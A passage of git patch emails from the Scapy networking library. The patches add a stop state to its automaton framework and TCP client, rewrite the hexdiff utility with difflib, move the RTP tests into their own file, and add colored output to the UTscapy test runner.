``initial``, ``final``, ``stop`` and ``error``, that, when set to ``True``, indicating that the state is an initial, final, stop or error state. + +.. note:: The ``initial`` state is called while starting the automata. The ``final`` step will tell the automata has reached its end. If you call ``atmt.stop()``, the automata will move to the ``stop`` step whatever its current state is. The ``error`` state will mark the automata as errored. If no ``stop`` state is specified, calling ``stop`` and ``forcestop`` will be equivalent. :: @@ -689,20 +691,35 @@ States are methods decorated by the result of the ``ATMT.state`` function. It ca @ATMT.state(initial=1) def BEGIN(self): pass - + @ATMT.state() def SOME_STATE(self): pass - + @ATMT.state(final=1) def END(self): return "Result of the automaton: 42" - + + @ATMT.state(stop=1) + def STOP(self): + print("SHUTTING DOWN...") + # e.g. close sockets... + + @ATMT.condition(STOP) + def is_stopping(self): + raise self.END() + @ATMT.state(error=1) def ERROR(self): return "Partial result, or explanation" # [...] +Take for instance the TCP client: + +.. image:: graphics/ATMT_TCP_client.svg + +The ``START`` event is ``initial=1``, the ``STOP`` event is ``stop=1`` and the ``CLOSED`` event is ``final=1``. + Decorators for transitions ~~~~~~~~~~~~~~~~~~~~~~~~~~ @@ -736,6 +753,35 @@ When the automaton switches to a given state, the state's method is executed. Th def waiting_timeout(self): raise self.ERROR_TIMEOUT() +.. note:: Within an ``ATMT.receive_condition`` handler, it is possible to change the state while passing an argument for the conditions of the next state using the ``action_parameters`` function. This allows to immediately re-trigger the ``ATMT.receive_condition`` of the new state (or any condition that requires an argument). For instance: ``raise self.NEW_STATE().action_parameters(pkt)`` + +For instance, this automaton will go from ``WAITING`` to ``ACK_RECEIVED`` with a **single** FIN+ACK TCP packet. + +:: + + class Example(Automaton): + @ATMT.state() + def WAITING(self): + pass + + @ATMT.state() + def FIN_RECEIVED(self): + pass + + @ATMT.state() + def ACK_RECEIVED(self): + pass + + @ATMT.receive_condition(WAITING) + def is_fin(self, pkt): + if pkt[TCP].flags.F: + raise self.FIN_RECEIVED().action_parameters(pkt) + + @ATMT.receive_condition(FIN_RECEIVED) + def is_ack(self, pkt): + if pkt[TCP].flags.A: + raise self.ACK_RECEIVED() + Decorator for actions ~~~~~~~~~~~~~~~~~~~~~ diff --git a/doc/scapy/graphics/ATMT_TCP_client.svg b/doc/scapy/graphics/ATMT_TCP_client.svg new file mode 100644 index 00000000000..c1c589aafc8 --- /dev/null +++ b/doc/scapy/graphics/ATMT_TCP_client.svg @@ -0,0 +1,130 @@ + + + + + + +Automaton_metaclass + + + +START + +START + + + +SYN_SENT + +SYN_SENT + + + +START->SYN_SENT + + +connect +>[send_syn] + + + +CLOSED + +CLOSED + + + +STOP + +STOP + + + +STOP_SENT_FIN_ACK + +STOP_SENT_FIN_ACK + + + +STOP->STOP_SENT_FIN_ACK + + +stop_behavior + + + +ESTABLISHED + +ESTABLISHED + + + +SYN_SENT->ESTABLISHED + + +synack_received +>[send_ack_of_synack] + + + +STOP_SENT_FIN_ACK->CLOSED + + +stop_ack_received + + + +STOP_SENT_FIN_ACK->CLOSED + + +stop_ack_timeout/1.0s + + + +ESTABLISHED->CLOSED + + +reset_received + + + +ESTABLISHED->ESTABLISHED + + +incoming_data_received +>[receive_data] + + + +ESTABLISHED->ESTABLISHED + + +outgoing_data_received +>[send_data] + + + +LAST_ACK + +LAST_ACK + + + +ESTABLISHED->LAST_ACK + + +fin_received +>[send_finack] + + + +LAST_ACK->CLOSED + + +ack_of_fin_received + + + diff --git a/scapy/automaton.py b/scapy/automaton.py index f48863a4aaa..85f7f9a315c 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -8,6 +8,9 @@ Automata with states, transitions and actions. """ +# TODO: +# - add documentation for ioevent, as_supersocket... + import itertools import logging import os @@ -308,6 +311,7 @@ def __init__(self, state_func, automaton, *args, **kargs): self.state = state_func.atmt_state self.initial = state_func.atmt_initial self.error = state_func.atmt_error + self.stop = state_func.atmt_stop self.final = state_func.atmt_final Exception.__init__(self, "Request state [%s]" % self.state) self.automaton = automaton @@ -327,12 +331,13 @@ def __repr__(self): return "NewStateRequested(%s)" % self.state @staticmethod - def state(initial=0, final=0, error=0): + def state(initial=0, final=0, stop=0, error=0): def deco(f, initial=initial, final=final): f.atmt_type = ATMT.STATE f.atmt_state = f.__name__ f.atmt_initial = initial f.atmt_final = final + f.atmt_stop = stop f.atmt_error = error def state_wrapper(self, *args, **kargs): @@ -343,6 +348,7 @@ def state_wrapper(self, *args, **kargs): state_wrapper.atmt_state = f.__name__ state_wrapper.atmt_initial = initial state_wrapper.atmt_final = final + state_wrapper.atmt_stop = stop state_wrapper.atmt_error = error state_wrapper.atmt_origfunc = f return state_wrapper @@ -406,6 +412,7 @@ class _ATMT_Command: NEXT = "NEXT" FREEZE = "FREEZE" STOP = "STOP" + FORCESTOP = "FORCESTOP" END = "END" EXCEPTION = "EXCEPTION" SINGLESTEP = "SINGLESTEP" @@ -484,6 +491,7 @@ def __new__(cls, name, bases, dct): cls.timeout = {} cls.actions = {} cls.initial_states = [] + cls.stop_states = [] cls.ionames = [] cls.iosupersockets = [] @@ -509,6 +517,8 @@ def __new__(cls, name, bases, dct): cls.timeout[s] = [] if m.atmt_initial: cls.initial_states.append(m) + if m.atmt_stop: + cls.stop_states.append(m) elif m.atmt_type in [ATMT.CONDITION, ATMT.RECV, ATMT.TIMEOUT, ATMT.IOEVENT]: # noqa: E501 cls.actions[m.atmt_condname] = [] @@ -554,6 +564,8 @@ def build_graph(self): se += '\t"%s" [ style=filled, fillcolor=green, shape=octagon ];\n' % st.atmt_state # noqa: E501 elif st.atmt_error: se += '\t"%s" [ style=filled, fillcolor=red, shape=octagon ];\n' % st.atmt_state # noqa: E501 + elif st.atmt_stop: + se += '\t"%s" [ style=filled, fillcolor=orange, shape=box, root=true ];\n' % st.atmt_state # noqa: E501 s += se for st in six.itervalues(self.states): @@ -840,6 +852,14 @@ def _do_control(self, ready, *args, **kargs): elif c.type == _ATMT_Command.FREEZE: continue elif c.type == _ATMT_Command.STOP: + if self.stop_states: + # There is a stop state + self.state = self.stop_states[0](self) + iterator = self._do_iter() + else: + # Act as FORCESTOP + break + elif c.type == _ATMT_Command.FORCESTOP: break while True: state = next(iterator) @@ -1009,8 +1029,7 @@ def next(self): return self.run(resume=Message(type=_ATMT_Command.NEXT)) __next__ = next - def stop(self): - self.cmdin.send(Message(type=_ATMT_Command.STOP)) + def _flush_inout(self): with self.started: # Flush command pipes while True: @@ -1020,6 +1039,14 @@ def stop(self): for fd in r: fd.recv() + def stop(self): + self.cmdin.send(Message(type=_ATMT_Command.STOP)) + self._flush_inout() + + def forcestop(self): + self.cmdin.send(Message(type=_ATMT_Command.FORCESTOP)) + self._flush_inout() + def restart(self, *args, **kargs): self.stop() self.start(*args, **kargs) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index cfa1055a248..aece02ca1f9 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1811,6 +1811,14 @@ def LAST_ACK(self): def CLOSED(self): pass + @ATMT.state(stop=1) + def STOP(self): + pass + + @ATMT.state() + def STOP_SENT_FIN_ACK(self): + pass + @ATMT.condition(START) def connect(self): raise self.SYN_SENT() @@ -1881,6 +1889,25 @@ def ack_of_fin_received(self, pkt): if pkt[TCP].flags.A: raise self.CLOSED() + @ATMT.condition(STOP) + def stop_behavior(self): + self.l4[TCP].flags = "FA" + self.send(self.l4) + self.l4[TCP].seq += 1 + raise self.STOP_SENT_FIN_ACK() + + @ATMT.receive_condition(STOP_SENT_FIN_ACK) + def stop_ack_received(self, pkt): + if pkt[TCP].flags.F: + self.l4[TCP].flags = "FA" + self.l4[TCP].ack = pkt[TCP].seq + 1 + self.send(self.l4) + raise self.CLOSED() + + @ATMT.timeout(STOP_SENT_FIN_ACK, 1) + def stop_ack_timeout(self): + raise self.CLOSED() + ##################### # Reporting stuff # diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index a52a1bbca14..c558c2b7745 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -33,6 +33,10 @@ a = TLSClientAutomaton.tlslink(HTTP, server="www.google.com", dport=443) pkt = a.sr1(HTTP()/HTTPRequest(), session=TCPSession(app=True), timeout=2) + +TODO: + - Add an event with `stop=1` (called on atmt.stop()) that correctly calls + one of the `CLOSE_NOTIFY` events depending on the SSL/TLS version. """ from __future__ import print_function diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index ddefdbaac2f..c1a38ab03b1 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -1394,7 +1394,7 @@ def sslv2_close_session_final(self): self.socket.close() raise self.FINAL() - @ATMT.state(final=True) + @ATMT.state(stop=True, final=True) def FINAL(self): self.vprint("Closing server socket...") self.serversocket.close() From df5ba942a49da020c7bee01431e7add64c9c8d86 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 3 Oct 2020 20:47:12 +0200 Subject: [PATCH 0300/1632] Enable sphinx.ext.todo --- doc/scapy/conf.py | 4 ++++ scapy/automaton.py | 5 +++-- scapy/layers/tls/automaton_cli.py | 3 ++- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index 61611e36c0f..29d3948c799 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -36,6 +36,7 @@ extensions = [ 'sphinx.ext.autodoc', 'sphinx.ext.napoleon', + 'sphinx.ext.todo', 'scapy_doc' ] @@ -45,6 +46,9 @@ 'undoc-members': True } +# Enable the todo module +todo_include_todos = True + # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] diff --git a/scapy/automaton.py b/scapy/automaton.py index 85f7f9a315c..16588620810 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -6,10 +6,11 @@ """ Automata with states, transitions and actions. + +TODO: + - add documentation for ioevent, as_supersocket... """ -# TODO: -# - add documentation for ioevent, as_supersocket... import itertools import logging diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index c558c2b7745..1523b080f7d 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -36,7 +36,8 @@ TODO: - Add an event with `stop=1` (called on atmt.stop()) that correctly calls - one of the `CLOSE_NOTIFY` events depending on the SSL/TLS version. + one of the `CLOSE_NOTIFY` events depending on the SSL/TLS version. + """ from __future__ import print_function From 2560734db732419a95507c1bde962c5a2f7f8a51 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Mon, 5 Oct 2020 20:01:15 +0200 Subject: [PATCH 0301/1632] Use difflib in hexdiff (#2849) * Use difflib in hexdiff * More hexdiff tests --- scapy/utils.py | 67 +++++++++++++++++++++++++++++---------------- test/regression.uts | 56 +++++++++++++++++++++++++++++++++---- 2 files changed, 93 insertions(+), 30 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index a9bef03fd30..057a71034cc 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -11,6 +11,7 @@ from __future__ import print_function from decimal import Decimal +import difflib import os import sys import socket @@ -291,33 +292,51 @@ def repr_hex(s): @conf.commands.register -def hexdiff(x, y): - """Show differences between 2 binary strings""" - x = bytes_encode(x)[::-1] - y = bytes_encode(y)[::-1] - SUBST = 1 - INSERT = 1 - d = {(-1, -1): (0, (-1, -1))} - for j in range(len(y)): - d[-1, j] = d[-1, j - 1][0] + INSERT, (-1, j - 1) - for i in range(len(x)): - d[i, -1] = d[i - 1, -1][0] + INSERT, (i - 1, -1) - - for j in range(len(y)): - for i in range(len(x)): - d[i, j] = min((d[i - 1, j - 1][0] + SUBST * (x[i] != y[j]), (i - 1, j - 1)), # noqa: E501 - (d[i - 1, j][0] + INSERT, (i - 1, j)), - (d[i, j - 1][0] + INSERT, (i, j - 1))) +def hexdiff(x, y, autojunk=False): + """ + Show differences between 2 binary strings, Packets... + + For the autojunk parameter, see + https://docs.python.org/3.8/library/difflib.html#difflib.SequenceMatcher + + :param x: + :param y: The binary strings, packets... to compare + :param autojunk: Setting it to True will likely increase the comparison + speed a lot on big byte strings, but will reduce accuracy (will tend + to miss insertion and see replacements instead for instance). + """ + + # Compare the strings using difflib + + x = bytes_encode(x) + y = bytes_encode(y) + + sm = difflib.SequenceMatcher(a=x, b=y, autojunk=autojunk) + x = [x[i:i + 1] for i in range(len(x))] + y = [y[i:i + 1] for i in range(len(y))] backtrackx = [] backtracky = [] - i = len(x) - 1 - j = len(y) - 1 - while not (i == j == -1): - i2, j2 = d[i, j][1] - backtrackx.append(x[i2 + 1:i + 1]) - backtracky.append(y[j2 + 1:j + 1]) - i, j = i2, j2 + for opcode in sm.get_opcodes(): + typ, x0, x1, y0, y1 = opcode + if typ == 'delete': + backtrackx += x[x0:x1] + backtracky += [''] * (x1 - x0) + elif typ == 'insert': + backtrackx += [''] * (y1 - y0) + backtracky += y[y0:y1] + elif typ in ['equal', 'replace']: + backtrackx += x[x0:x1] + backtracky += y[y0:y1] + + if autojunk: + # Some lines may have been considered as junk. Check the sizes + lbx = len(backtrackx) + lby = len(backtracky) + backtrackx += [''] * (max(lbx, lby) - lbx) + backtracky += [''] * (max(lbx, lby) - lby) + + # Print the diff x = y = i = 0 colorize = {0: lambda x: x, diff --git a/test/regression.uts b/test/regression.uts index 438e7568b89..8d7c2999ca4 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -608,19 +608,63 @@ assert(fletcher16_checkbytes(b"\x28\x07", 1) == b"\xaf(") = Test hexdiff function ~ not_pypy -def test_hexdiff(): +def test_hexdiff(a, b, autojunk=False): conf_color_theme = conf.color_theme conf.color_theme = BlackAndWhite() with ContextManagerCaptureOutput() as cmco: - hexdiff("abcde", "abCde") + hexdiff(a, b, autojunk=autojunk) result_hexdiff = cmco.get_output() conf.interactive = True conf.color_theme = conf_color_theme - expected = "0000 61 62 63 64 65 abcde\n" - expected += " 0000 61 62 43 64 65 abCde\n" - assert(result_hexdiff == expected) + return result_hexdiff -test_hexdiff() +# Basic string test + +result_hexdiff = test_hexdiff("abcde", "abCde") +expected = "0000 61 62 63 64 65 abcde\n" +expected += " 0000 61 62 43 64 65 abCde\n" +assert result_hexdiff == expected + +# More advanced string test + +result_hexdiff = test_hexdiff("add_common_", "_common_removed") +expected = "0000 61 64 64 5F 63 6F 6D 6D 6F 6E 5F add_common_ \n" +expected += " -003 5F 63 6F 6D 6D 6F 6E 5F 72 65 6D 6F 76 _common_remov\n" +expected += " 000d 65 64 ed\n" +assert result_hexdiff == expected + +# Compare packets + +result_hexdiff = test_hexdiff(IP(dst="127.0.0.1", src="127.0.0.1"), IP(dst="127.0.0.2", src="127.0.0.1")) +expected = "0000 45 00 00 14 00 01 00 00 40 00 7C E7 7F 00 00 01 E.......@.|.....\n" +expected += " 0000 45 00 00 14 00 01 00 00 40 00 7C E6 7F 00 00 01 E.......@.|.....\n" +expected += "0010 7F 00 00 01 ....\n" +expected += " 0010 7F 00 00 02 ....\n" +assert result_hexdiff == expected + +# Compare using autojunk + +a = "A" * 1000 + "findme" + "B" * 1000 +b = "A" * 1000 + "B" * 1000 +ret1 = test_hexdiff(a, b) +ret2 = test_hexdiff(a, b, autojunk=True) + +expected_ret1 = """ +03d0 03d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +03e0 41 41 41 41 41 41 41 41 66 69 6E 64 6D 65 42 42 AAAAAAAAfindmeBB + 03e0 41 41 41 41 41 41 41 41 42 42 AAAAAAAA BB +03ea 03ea 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +""" +expected_ret2 = """ +03d0 03d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +03e0 41 41 41 41 41 41 41 41 66 69 6E 64 6D 65 42 42 AAAAAAAAfindmeBB + 03e0 41 41 41 41 41 41 41 41 42 42 42 42 42 42 42 42 AAAAAAAABBBBBBBB +03f0 03f0 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +""" + +assert ret1 != ret2 +assert expected_ret1 in ret1 +assert expected_ret2 in ret2 = Test mysummary functions - Ether From c9d8091335a204050e315ae7de96129b58f45dad Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 4 Oct 2020 14:02:57 +0200 Subject: [PATCH 0302/1632] Standalone RTP unit tests Co-authored-by: Pierre Lalet --- test/regression.uts | 43 ----------------------------------- test/scapy/layers/rtp.uts | 47 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 47 insertions(+), 43 deletions(-) create mode 100644 test/scapy/layers/rtp.uts diff --git a/test/regression.uts b/test/regression.uts index 8d7c2999ca4..3d148ac4458 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12104,49 +12104,6 @@ with mock.patch("scapy._version_from_git_describe") as version_mocked: assert(scapy._version() == "git-archive.dev$Format:%h") -############ -# RTP -############ - -+ RTP tests - -= test rtp with extension header -~ rtp - -data = b'\x90o\x14~YY\xf5h\xcc#\xd7\xcfUH\x00\x03\x167116621 \x000\x00' -pkt = RTP(data) -assert "RTP" in pkt -parsed = pkt["RTP"] -assert parsed.version == 2 -assert parsed.extension -assert parsed.numsync == 0 -assert not parsed.marker -assert parsed.payload_type == 111 -assert parsed.sequence == 5246 -assert parsed.timestamp == 1499067752 -assert parsed.sourcesync == 0xcc23d7cf -assert "RTPExtension" in parsed, parsed.show() -assert parsed["RTPExtension"].header_id == 0x5548 -assert parsed["RTPExtension"].header == [0x16373131,0x36363231,0x20003000] - -= test layer creation - -created = RTP(extension=True, payload_type="PCMA", sequence=0x1234, timestamp=12345678, sourcesync=0xabcdef01) -created /= RTPExtension(header_id=0x4321, header=[0x11223344]) -assert raw(created) == b'\x90\x08\x124\x00\xbcaN\xab\xcd\xef\x01C!\x00\x01\x11"3D' -parsed = RTP(raw(created)) -assert parsed.payload_type == 8 -assert "RTPExtension" in parsed, parsed.show() -assert parsed["RTPExtension"].header == [0x11223344] - -= test RTP without extension - -created = RTP(extension=False, payload_type="DVI4", sequence=0x1234, timestamp=12345678, sourcesync=0xabcdef01) -assert raw(created) == b'\x80\x11\x124\x00\xbcaN\xab\xcd\xef\x01' -parsed = RTP(raw(created)) -assert parsed.sourcesync == 0xabcdef01 -assert "RTPExtension" not in parsed - = UTscapy HTML output import tempfile, os diff --git a/test/scapy/layers/rtp.uts b/test/scapy/layers/rtp.uts new file mode 100644 index 00000000000..4aef39eb84e --- /dev/null +++ b/test/scapy/layers/rtp.uts @@ -0,0 +1,47 @@ +% RTP regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + +############ +# RTP +############ + ++ RTP tests + += test rtp with extension header +~ rtp + +data = b'\x90o\x14~YY\xf5h\xcc#\xd7\xcfUH\x00\x03\x167116621 \x000\x00' +pkt = RTP(data) +assert "RTP" in pkt +parsed = pkt["RTP"] +assert parsed.version == 2 +assert parsed.extension +assert parsed.numsync == 0 +assert not parsed.marker +assert parsed.payload_type == 111 +assert parsed.sequence == 5246 +assert parsed.timestamp == 1499067752 +assert parsed.sourcesync == 0xcc23d7cf +assert "RTPExtension" in parsed, parsed.show() +assert parsed["RTPExtension"].header_id == 0x5548 +assert parsed["RTPExtension"].header == [0x16373131,0x36363231,0x20003000] + += test layer creation + +created = RTP(extension=True, payload_type="PCMA", sequence=0x1234, timestamp=12345678, sourcesync=0xabcdef01) +created /= RTPExtension(header_id=0x4321, header=[0x11223344]) +assert raw(created) == b'\x90\x08\x124\x00\xbcaN\xab\xcd\xef\x01C!\x00\x01\x11"3D' +parsed = RTP(raw(created)) +assert parsed.payload_type == 8 +assert "RTPExtension" in parsed, parsed.show() +assert parsed["RTPExtension"].header == [0x11223344] + += test RTP without extension + +created = RTP(extension=False, payload_type="DVI4", sequence=0x1234, timestamp=12345678, sourcesync=0xabcdef01) +assert raw(created) == b'\x80\x11\x124\x00\xbcaN\xab\xcd\xef\x01' +parsed = RTP(raw(created)) +assert parsed.sourcesync == 0xabcdef01 +assert "RTPExtension" not in parsed + From 8153736544b8cedeabfdac81db1f92de6d12181d Mon Sep 17 00:00:00 2001 From: Gabriel Date: Wed, 7 Oct 2020 21:26:39 +0200 Subject: [PATCH 0303/1632] Add colors to UTscapy (#2844) * Add colors to UTscapy * UTscapy: fix Python 2 unicode --- scapy/tools/UTscapy.py | 216 +++++++++++++++++++++++++------------- test/configs/bsd.utsc | 1 - test/configs/linux.utsc | 1 - test/configs/solaris.utsc | 1 - test/configs/windows.utsc | 1 - test/run_tests | 2 +- 6 files changed, 144 insertions(+), 78 deletions(-) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 5f861bcd328..e91a91ffa78 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -8,6 +8,7 @@ """ from __future__ import print_function + import bz2 import copy import code @@ -29,6 +30,33 @@ from scapy.modules.six.moves import range from scapy.config import conf from scapy.compat import base64_bytes, bytes_hex, plain_str +from scapy.themes import DefaultTheme, BlackAndWhite + + +# Check UTF-8 support # + +def _utf8_support(): + """ + Check UTF-8 support for the output + """ + try: + if six.PY2: + return False + if WINDOWS: + return (sys.stdout.encoding == "utf-8") + return True + except AttributeError: + return False + + +if _utf8_support(): + arrow = "\u2514" + dash = "\u2501" + checkmark = "\u2713" +else: + arrow = "->" + dash = "--" + checkmark = "OK" # Util class # @@ -240,6 +268,7 @@ def __init__(self, name): self.test = "" self.comments = "" self.result = "passed" + self.fresult = "" # make instance True at init to have a different truth value than None self.duration = 0 self.output = "" @@ -248,12 +277,16 @@ def __init__(self, name): self.crc = None self.expand = 1 - def decode(self): + def prepare(self, theme): if six.PY2: self.test = self.test.decode("utf8", "ignore") self.output = self.output.decode("utf8", "ignore") self.comments = self.comments.decode("utf8", "ignore") self.result = self.result.decode("utf8", "ignore") + if self.result == "passed": + self.fresult = theme.success(self.result) + else: + self.fresult = theme.fail(self.result) def __nonzero__(self): return self.result == "passed" @@ -288,7 +321,7 @@ def parse_config_file(config_path, verb=3): with open(config_path) as config_file: data = json.load(config_file) if verb > 2: - print("### Loaded config file", config_path, file=sys.stderr) + print(" %s Loaded config file" % arrow, config_path, file=sys.stderr) def get_if_exist(key, default): return data[key] if key in data else default @@ -476,7 +509,8 @@ def remove_empty_testsets(test_campaign): # RUN TEST # -def run_test(test, get_interactive_session, verb=3, ignore_globals=None, my_globals=None): +def run_test(test, get_interactive_session, theme, verb=3, + ignore_globals=None, my_globals=None): """An internal UTScapy function to run a single test""" start_time = time.time() test.output, res = get_interactive_session(test.test.strip(), ignore_globals=ignore_globals, verb=verb, my_globals=my_globals) @@ -499,11 +533,11 @@ def run_test(test, get_interactive_session, verb=3, ignore_globals=None, my_glob cls, val = debug.crashed_on test.output += "\n\nPACKET DISSECTION FAILED ON:\n %s(hex_bytes('%s'))" % (cls.__name__, plain_str(bytes_hex(val))) debug.crashed_on = None - test.decode() + test.prepare(theme) if verb > 2: - print("%(result)6s %(crc)s %(duration)06.2fs %(name)s" % test, file=sys.stderr) + print("%(fresult)6s %(crc)s %(duration)06.2fs %(name)s" % test, file=sys.stderr) elif verb > 1: - print("%(result)6s %(crc)s %(name)s" % test, file=sys.stderr) + print("%(fresult)6s %(crc)s %(name)s" % test, file=sys.stderr) return bool(test) @@ -522,7 +556,9 @@ def import_UTscapy_tools(ses): ses["conf"].route6.routes = conf.route6.routes -def run_campaign(test_campaign, get_interactive_session, drop_to_interpreter=False, verb=3, ignore_globals=None, scapy_ses=None): # noqa: E501 +def run_campaign(test_campaign, get_interactive_session, theme, + drop_to_interpreter=False, verb=3, + ignore_globals=None, scapy_ses=None): passed = failed = 0 if test_campaign.preexec: test_campaign.preexec_output = get_interactive_session( @@ -540,7 +576,8 @@ def drop(scapy_ses): try: for i, testset in enumerate(test_campaign): for j, t in enumerate(testset): - if run_test(t, get_interactive_session, verb, my_globals=scapy_ses): + if run_test(t, get_interactive_session, theme, + verb=verb, my_globals=scapy_ses): passed += 1 else: failed += 1 @@ -559,12 +596,15 @@ def drop(scapy_ses): test_campaign.passed = passed test_campaign.failed = failed + style = [theme.success, theme.fail][bool(failed)] if verb > 2: print("Campaign CRC=%(crc)s in %(duration)06.2fs SHA=%(sha)s" % test_campaign, file=sys.stderr) # noqa: E501 - print("PASSED=%i FAILED=%i" % (passed, failed), file=sys.stderr) + print(style("PASSED=%i FAILED=%i" % (passed, failed)), + file=sys.stderr) elif verb: print("Campaign CRC=%(crc)s SHA=%(sha)s" % test_campaign, file=sys.stderr) # noqa: E501 - print("PASSED=%i FAILED=%i" % (passed, failed), file=sys.stderr) + print(style("PASSED=%i FAILED=%i" % (passed, failed)), + file=sys.stderr) return failed @@ -588,10 +628,15 @@ def html_info_line(test_campaign): # CAMPAIGN TO something # -def campaign_to_TEXT(test_campaign): - output = "%(title)s\n" % test_campaign - output += "-- " + info_line(test_campaign) + "\n\n" - output += "Passed=%(passed)i\nFailed=%(failed)i\n\n%(headcomments)s\n" % test_campaign +def campaign_to_TEXT(test_campaign, theme): + ptheme = [lambda x: x, theme.success][bool(test_campaign.passed)] + ftheme = [lambda x: x, theme.fail][bool(test_campaign.failed)] + + output = theme.green("\n%(title)s\n" % test_campaign) + output += dash + " " + info_line(test_campaign) + "\n" + output += ptheme(" " + arrow + " Passed=%(passed)i\n" % test_campaign) + output += ftheme(" " + arrow + " Failed=%(failed)i\n" % test_campaign) + output += "%(headcomments)s\n" % test_campaign for testset in test_campaign: if any(t.expand for t in testset): @@ -603,8 +648,8 @@ def campaign_to_TEXT(test_campaign): return output -def campaign_to_ANSI(test_campaign): - return campaign_to_TEXT(test_campaign) +def campaign_to_ANSI(test_campaign, theme): + return campaign_to_TEXT(test_campaign, theme) def campaign_to_xUNIT(test_campaign): @@ -786,7 +831,9 @@ def usage(): # MAIN # def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOCS, - FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, autorun_func, pos_begin=0, ignore_globals=None, scapy_ses=None): # noqa: E501 + FORMAT, VERB, ONLYFAILED, CRC, INTERPRETER, + autorun_func, theme, pos_begin=0, + ignore_globals=None, scapy_ses=None): # noqa: E501 # Parse test file test_campaign = parse_campaign_file(TESTFILE) @@ -820,7 +867,13 @@ def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOC # Run tests test_campaign.output_file = OUTPUTFILE - result = run_campaign(test_campaign, autorun_func[FORMAT], drop_to_interpreter=INTERPRETER, verb=VERB, ignore_globals=None, scapy_ses=scapy_ses) # noqa: E501 + result = run_campaign( + test_campaign, autorun_func[FORMAT], theme, + drop_to_interpreter=INTERPRETER, + verb=VERB, + ignore_globals=None, + scapy_ses=scapy_ses + ) # Shrink passed if ONLYFAILED: @@ -832,9 +885,9 @@ def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOC # Generate report if FORMAT == Format.TEXT: - output = campaign_to_TEXT(test_campaign) + output = campaign_to_TEXT(test_campaign, theme) elif FORMAT == Format.ANSI: - output = campaign_to_ANSI(test_campaign) + output = campaign_to_ANSI(test_campaign, theme) elif FORMAT == Format.HTML: test_campaign.startNum(pos_begin) output = campaign_to_HTML(test_campaign) @@ -862,6 +915,11 @@ def main(): logger.addHandler(logging.StreamHandler()) ignore_globals = list(six.moves.builtins.__dict__) + import scapy + print(dash + " UTScapy - Scapy %s - %s" % ( + scapy.__version__, sys.version.split(" ")[0] + )) + # Parse arguments FORMAT = Format.ANSI @@ -968,64 +1026,69 @@ def main(): elif opt == "-K": KW_KO.extend(optarg.split(",")) - # Disable tests if needed + except getopt.GetoptError as msg: + print("ERROR:", msg, file=sys.stderr) + raise SystemExit - # Discard Python3 tests when using Python2 - if six.PY2: - KW_KO.append("python3_only") - if VERB > 2: - print("### Python 2 mode ###") - try: - if NON_ROOT or os.getuid() != 0: # Non root - # Discard root tests - KW_KO.append("netaccess") - KW_KO.append("needs_root") - if VERB > 2: - print("### Non-root mode ###") - except AttributeError: - pass - - if conf.use_pcap: - KW_KO.append("not_pcapdnet") + if FORMAT in [Format.LIVE, Format.ANSI]: + theme = DefaultTheme() + else: + theme = BlackAndWhite() + + # Disable tests if needed + + # Discard Python3 tests when using Python2 + if six.PY2: + KW_KO.append("python3_only") + if VERB > 2: + print(" " + arrow + " Python 2 mode") + try: + if NON_ROOT or os.getuid() != 0: # Non root + # Discard root tests + KW_KO.append("netaccess") + KW_KO.append("needs_root") if VERB > 2: - print("### libpcap mode ###") + print(" " + arrow + " Non-root mode") + except AttributeError: + pass - KW_KO.append("disabled") + if conf.use_pcap: + KW_KO.append("not_pcapdnet") + if VERB > 2: + print(" " + arrow + " libpcap mode ###") - # Process extras - if six.PY3: - KW_KO.append("FIXME_py3") + KW_KO.append("disabled") - if ANNOTATIONS_MODE: - try: - from pyannotate_runtime import collect_types - except ImportError: - raise ImportError("Please install pyannotate !") - collect_types.init_types_collection() - collect_types.start() + # Process extras + if six.PY3: + KW_KO.append("FIXME_py3") - if VERB > 2: - print("### Booting scapy...", file=sys.stderr) + if ANNOTATIONS_MODE: try: - from scapy import all as scapy - except Exception as e: - print("[CRITICAL]: Cannot import Scapy: %s" % e, file=sys.stderr) - traceback.print_exc() - sys.exit(1) # Abort the tests + from pyannotate_runtime import collect_types + except ImportError: + raise ImportError("Please install pyannotate !") + collect_types.init_types_collection() + collect_types.start() - for m in MODULES: - try: - mod = import_module(m) - six.moves.builtins.__dict__.update(mod.__dict__) - except ImportError as e: - raise getopt.GetoptError("cannot import [%s]: 